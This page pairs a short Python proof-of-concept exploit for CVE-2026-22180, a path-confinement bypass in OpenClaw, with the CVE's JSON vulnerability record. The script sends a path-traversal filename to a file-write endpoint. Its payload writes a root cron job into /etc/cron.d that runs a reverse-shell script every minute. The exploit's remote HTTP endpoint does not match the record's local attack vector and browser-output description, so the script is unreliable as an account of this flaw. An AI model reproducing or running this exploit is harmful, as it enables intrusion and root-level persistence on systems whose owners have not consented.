CVE-2026-22180

# CVE-2026-22180 PoC - Path Confinement Bypass # Target: OpenClaw < 2026.3.2 # Attack: Write files outside intended root directory import requests import os TARGET_URL = "http://target:8080" # Replace with actual target VULN_ENDPOINT = "/api/file/write" def create_malicious_filename(): """Generate filename with path traversal to escape root directory""" # Path traversal to write outside root directory malicious_path = "../../../../etc/cron.d/malicious_script" return malicious_path def exploit_cve_2026_22180(): """ Exploit path confinement bypass in OpenClaw file write operations """ payload = { "filename": create_malicious_filename(), "content": "#!/bin/bash\n# Malicious cron job injected via CVE-2026-22180\n* * * * * root /tmp/reverse_shell.sh\n" } print(f"[*] Targeting: {TARGET_URL}") print(f"[*] Payload filename: {payload['filename']}") try: response = requests.post( f"{TARGET_URL}{VULN_ENDPOINT}", json=payload, timeout=10 ) if response.status_code == 200: print("[+] File write successful - Path confinement bypassed!") print(f"[+] Response: {response.text}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2026-22180 - OpenClaw Path Confinement Bypass PoC") print("=" * 60) exploit_cve_2026_22180()

{"cve": {"id": "CVE-2026-22180", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:22.583", "lastModified": "2026-03-20T20:51:12.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.3.2 contain a path-confinement bypass vulnerability in browser output handling that allows writes outside intended root directories. Attackers can exploit insufficient canonical path-boundary validation in file write operations to escape root-bound restrictions and write files to arbitrary locations."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a la 2026.3.2 contienen una vulnerabilidad de omisión de confinamiento de ruta en el manejo de la salida del navegador que permite escrituras fuera de los directorios raíz previstos. Los atacantes pueden explotar la validación insuficiente de los límites de ruta canónica en las operaciones de escritura de archivos para evadir las restricciones ligadas a la raíz y escribir archivos en ubicaciones arbitrarias."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.2", "matchCriteriaId": "986EEC6C-F9E4-4B22-96D5-BBB98A4A738D"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/104d32bb64cdf19d5e77f70553a511a2ae90ad1c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3pxq-f3cp-jmxp", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-path-confinement-bypass-in-browser-output-and-file-write-operations", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}